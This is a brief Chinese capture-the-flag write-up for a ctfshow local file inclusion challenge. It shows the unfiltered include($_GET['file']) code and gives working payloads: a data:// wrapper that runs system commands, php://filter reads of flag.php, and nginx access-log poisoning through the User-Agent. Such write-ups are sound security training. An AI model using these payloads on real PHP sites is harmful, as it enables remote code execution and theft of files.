信息收集
表面上没有任何过滤,自由发挥
php
if(isset($_GET['file'])){
$file = $_GET['file'];
include($file);
}else{
highlight_file(__FILE__);
}解题
这些解法都在web32解释过,不再详细解释,有需要点击超链接:ctfshow web入门 web32
伪协议
php
?file=data://text/plain,<?php system("tac flag.php") ?>
?file=php://filter/read=convert.base64-encode/resource=flag.php
?file=php://filter/read=convert.iconv.ascii.utf-16/resource=flag.php日志包含
php
?file=/var/log/nginx/access.loguser-agent里写上
php
<?php system('ls'); ?>
<?php system('tac flag.php'); ?>